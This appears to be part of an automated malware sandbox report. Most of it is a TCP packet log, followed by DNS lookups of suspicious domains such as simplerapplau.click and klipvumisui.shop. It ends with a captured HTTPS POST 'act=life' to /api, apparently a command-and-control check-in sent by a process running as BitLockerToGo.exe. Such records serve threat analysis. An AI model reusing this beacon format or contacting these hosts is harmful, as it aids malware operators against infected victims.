                                                                                                                  Dec 29, 2024 08:56:26.289623976 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:26.289666891 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:26.296504021 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:26.296518087 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:26.296611071 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:26.296616077 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:26.296658993 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:26.302515030 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:26.302531004 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:26.302599907 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:26.302606106 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:26.302654982 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:26.308949947 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:26.308965921 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:26.309036016 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:26.309041023 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:26.309077024 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:26.315957069 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:26.315973997 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:26.316031933 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:26.316037893 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:26.316076040 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:26.322761059 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:26.322788000 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:26.322841883 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:26.322846889 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:26.322890043 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:26.487181902 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:26.487202883 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:26.487258911 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:26.487272978 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:26.487286091 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:26.489414930 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:26.493241072 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:26.493257046 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:26.493335962 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:26.493341923 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:26.493526936 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:26.500096083 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:26.500112057 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:26.500169039 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:26.500174046 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:26.500215054 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:26.507005930 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:26.507025003 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:26.507081985 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:26.507086992 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:26.507123947 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:26.513134956 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:26.513151884 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:26.513209105 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:26.513214111 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:26.513242960 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:26.513262033 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:26.520399094 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:26.520414114 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:26.520469904 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:26.520476103 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:26.520517111 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:26.526475906 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:26.526492119 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:26.526547909 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:26.526552916 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:26.526595116 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:26.533299923 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:26.533317089 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:26.533396006 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:26.533401966 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:26.533442974 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:26.697566986 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:26.697590113 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:26.697639942 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:26.697649002 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:26.697681904 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:26.697706938 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:26.704489946 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:26.704505920 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:26.704583883 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:26.704590082 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:26.704632998 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:26.710568905 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:26.710586071 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:26.710676908 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:26.710683107 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:26.710724115 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:26.717477083 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:26.717494011 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:26.717570066 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:26.717576027 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:26.717617989 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:26.724314928 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:26.724333048 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:26.724400043 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:26.724404097 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:26.724452019 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:26.730775118 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:26.730792999 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:26.730859995 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:26.730865002 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:26.730912924 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:26.737703085 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:26.737720013 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:26.737785101 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:26.737791061 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:26.737837076 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:26.743756056 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:26.743772984 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:26.743830919 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:26.743835926 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:26.743869066 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:26.743884087 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:26.908757925 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:26.908778906 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:26.908869028 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:26.908876896 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:26.908921003 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:26.914845943 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:26.914861917 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:26.914977074 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:26.914984941 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:26.915026903 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:26.921721935 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:26.921737909 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:26.921814919 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:26.921821117 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:26.921936035 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:26.928745985 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:26.928762913 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:26.928839922 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:26.928853035 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:26.928913116 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:26.934633017 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:26.934648991 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:26.934770107 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:26.934775114 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:26.934819937 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:26.941945076 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:26.941961050 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:26.942040920 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:26.942047119 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:26.942118883 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:26.948031902 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:26.948048115 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:26.948116064 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:26.948122025 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:26.948177099 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:26.954966068 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:26.954982042 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:26.955058098 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:26.955064058 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:26.955106974 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:27.119537115 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:27.119559050 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:27.119601011 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:27.119615078 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:27.119642019 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:27.119666100 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:27.125551939 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:27.125566959 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:27.125616074 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:27.125622988 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:27.125806093 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:27.132575035 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:27.132590055 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:27.132673979 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:27.132673979 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:27.132680893 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:27.132736921 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:27.139362097 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:27.139379025 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:27.139446020 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:27.139451981 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:27.139499903 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:27.146348000 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:27.146363020 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:27.146575928 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:27.146600962 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:27.146683931 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:27.152733088 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:27.152774096 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:27.152822018 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:27.152827978 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:27.152868986 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:27.152868986 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:27.158862114 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:27.158880949 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:27.159188986 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:27.159197092 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:27.159284115 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:27.165741920 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:27.165759087 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:27.165807962 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:27.165813923 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:27.165923119 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:27.330440044 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:27.330461979 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:27.330586910 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:27.330596924 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:27.330749989 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:27.336461067 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:27.336478949 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:27.336574078 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:27.336582899 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:27.336647987 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:27.343364000 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:27.343380928 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:27.343492985 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:27.343502998 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:27.343548059 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:27.350270033 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:27.350294113 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:27.350392103 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:27.350392103 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:27.350404024 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:27.350465059 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:27.356336117 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:27.356358051 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:27.356409073 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:27.356419086 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:27.356462002 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:27.356462002 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:27.363605022 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:27.363627911 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:27.363682985 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:27.363692999 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:27.363738060 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:27.363738060 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:27.369673014 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:27.369690895 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:27.369755983 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:27.369767904 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:27.369837999 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:27.376646042 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:27.376665115 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:27.376755953 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:27.376763105 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:27.376848936 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:27.541014910 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:27.541034937 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:27.541268110 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:27.541276932 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:27.541341066 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:27.547919035 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:27.547935963 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:27.548078060 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:27.548084021 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:27.548137903 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:27.554125071 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:27.554141045 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:27.554245949 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:27.554251909 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:27.554308891 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:27.556782961 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:27.556859016 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:27.556871891 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:27.556929111 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:27.565916061 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:27.565916061 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:27.565929890 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:27.565938950 CET44349796172.67.208.58192.168.2.5

                                                                                                                  UDP Packets

                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                  Dec 29, 2024 08:55:44.072993040 CET5510653192.168.2.51.1.1.1
                                                                                                                  Dec 29, 2024 08:55:44.450406075 CET53551061.1.1.1192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:07.767589092 CET5045253192.168.2.51.1.1.1
                                                                                                                  Dec 29, 2024 08:56:08.255306005 CET53504521.1.1.1192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:10.521126032 CET4961353192.168.2.51.1.1.1
                                                                                                                  Dec 29, 2024 08:56:10.845403910 CET53496131.1.1.1192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:11.892291069 CET5434253192.168.2.51.1.1.1
                                                                                                                  Dec 29, 2024 08:56:12.116686106 CET53543421.1.1.1192.168.2.5

                                                                                                                  DNS Queries

                                                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                  Dec 29, 2024 08:55:44.072993040 CET192.168.2.51.1.1.10x7cf0Standard query (0)simplerapplau.clickA (IP address)IN (0x0001)false
                                                                                                                  Dec 29, 2024 08:56:07.767589092 CET192.168.2.51.1.1.10xc2e9Standard query (0)cegu.shopA (IP address)IN (0x0001)false
                                                                                                                  Dec 29, 2024 08:56:10.521126032 CET192.168.2.51.1.1.10xe531Standard query (0)klipvumisui.shopA (IP address)IN (0x0001)false
                                                                                                                  Dec 29, 2024 08:56:11.892291069 CET192.168.2.51.1.1.10x4bcaStandard query (0)dfgh.onlineA (IP address)IN (0x0001)false

                                                                                                                  DNS Answers

                                                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                  Dec 29, 2024 08:55:44.450406075 CET1.1.1.1192.168.2.50x7cf0No error (0)simplerapplau.click172.67.152.160A (IP address)IN (0x0001)false
                                                                                                                  Dec 29, 2024 08:55:44.450406075 CET1.1.1.1192.168.2.50x7cf0No error (0)simplerapplau.click104.21.88.199A (IP address)IN (0x0001)false
                                                                                                                  Dec 29, 2024 08:56:08.255306005 CET1.1.1.1192.168.2.50xc2e9No error (0)cegu.shop185.161.251.21A (IP address)IN (0x0001)false
                                                                                                                  Dec 29, 2024 08:56:10.845403910 CET1.1.1.1192.168.2.50xe531No error (0)klipvumisui.shop172.67.208.58A (IP address)IN (0x0001)false
                                                                                                                  Dec 29, 2024 08:56:10.845403910 CET1.1.1.1192.168.2.50xe531No error (0)klipvumisui.shop104.21.37.128A (IP address)IN (0x0001)false
                                                                                                                  Dec 29, 2024 08:56:12.116686106 CET1.1.1.1192.168.2.50x4bcaName error (3)dfgh.onlinenonenoneA (IP address)IN (0x0001)false

                                                                                                                  HTTP Request Dependency Graph

                                                                                                                  • simplerapplau.click
                                                                                                                  • cegu.shop
                                                                                                                  • klipvumisui.shop

                                                                                                                  HTTPS Proxied Packets

                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  0192.168.2.549730172.67.152.1604435284C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-12-29 07:55:45 UTC266OUTPOST /api HTTP/1.1
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                  Content-Length: 8
                                                                                                                  Host: simplerapplau.click
                                                                                                                  2024-12-29 07:55:45 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                  Data Ascii: act=life
                                                                                                                  2024-12-29 07:55:46 UTC1125INHTTP/1.1 200 OK
                                                                                                                  Date: Sun, 29 Dec 2024 07:55:46 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: close
                                                                                                                  Set-Cookie: PHPSESSID=6qheu3jgbs0hbqkajtlebhtnd7; expires=Thu, 24 Apr 2025 01:42:25 GMT; Max-Age=9999999; path=/
                                                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                  Pragma: no-cache
                                                                                                                  X-Frame-Options: DENY
                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  vary: accept-encoding
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MhyxhWO8%2FhwWu6JYcjI%2BqvkXPeM8SMu8KsRKoI0Yvc8xKr0gERguBMEIUI8wB1DW3Hv9nxZbDJgF34ArhuKvA%2Fl88fcDmr2KgYPVev74mmLCsuBqjnaRin1x7hWp0pkZV7N4l7xy"}],"group":"cf-nel","max_age":604800}
